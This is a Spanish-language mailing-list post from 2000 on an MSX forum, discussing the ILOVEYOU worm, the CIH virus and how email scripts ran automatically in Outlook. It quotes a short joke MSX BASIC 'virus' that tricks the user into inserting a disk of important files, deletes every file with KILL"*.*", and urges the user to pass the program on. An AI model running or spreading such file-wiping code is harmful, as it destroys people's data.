HispaMSX

I LOVE YOU - see attached stupid people

2000-05-15 00:15:11
 * Author: Nin

 Hola, Rafael!
 Rafael Corrales Pulido escribio en un mensaje a All:

> [...]
 RP> este es uno de los virús más chorras que se ha extendido por la red,
 RP> muchos de los que estais en la lista ya habeis sido infectados por virús
 RP>
 RP> troyanos como el inocente I-worm happy o el puñetero Pretty Park.exe ,
 RP> que
 RP> contiene otro virús cuyo nombre  no recuerdo, ambos hacen lo mismo,
 RP> primero cogen las direcciones de correo que teneis esparcidas por las
 RP> agendas y recovecos del disco duro y envian un mensaje sin vuestro
 RP> permiso
 RP> a todos los destinatarios adjuntando el ejecutable del virús...

Y mas aun habiendose activado una semana antes el CIH que nos dejo el
servicio tecnico con 20 PCs de clientes, de los 25 que teniamos en
ese momento, sin datos en los HD y con la placa base para tirar a la basura.

 RP> Pero seamos serios, por correo electrónico se puede adjuntar algún
 RP> codigo
 RP> ejecutable, pero no hay posibilidad de enviar código que se autoejecute
 RP> al
 RP> recibirse el mensaje sin permiso del usuario, es el usuario el
 RP> responsable
 RP> de abrir o no abrir los archivos, documentos o ejecutables adjuntos al
 RP> mensaje, ¿cómo demonios puede ser que en este caso hayan picado tantos
 RP> usuarios de instituciones oficiales de los gobiernos?, esto solo
 RP> demuestra

Y tanto que se puede ejecutar sin nisiquiera abrirlo, no son mas
que scripts y solo pasa si utilizas como lector de correo el kkoutlook
de mocosoft con la configuracion por defecto.

 RP> No me enrollaré, os envio un virús para MSX muy similar al I LOVE YOU
 RP> ;-DD

Ya puestos y dado que colecciono virus y que este es  un area de msx...
alguien me puede mandar el virus es que aparecido para MSX?

 RP> 10 REM Esto es un virus! (no me lo creo ni yo)
 RP> 20 ON ERROR GOTO 200
 RP> 25 CLS:KEY OFF:SCREEN 1:PRINT"Mete un disco con archivos   muy
 RP> importantes
 RP> y pulsa      return":INPUT 30 KILL"*.*" 40 PRINT"Envia este programita a
 RP>
 RP> todostus amigos o se quemara tu   MSX!!" 45 FOR T=0TO1500: NEXT T 50
 RP> DEFUSR=0 60 A=USR(0) 200 IF N=0 THEN PRINT"serias tan amable de
 RP> desproteger el disco???" 210 PRINT"Hazlo ya mismo, venga!!!!" 215 FOR
 RP> T=0TO2000:NEXT T 230 RUN

Bueno, mas que un virus esto es un troyano...

 Nos leemos!,
 Jose Casanova Salces

... Estás más tranquilo que la Casa de la Pradera a la hora de la Misa.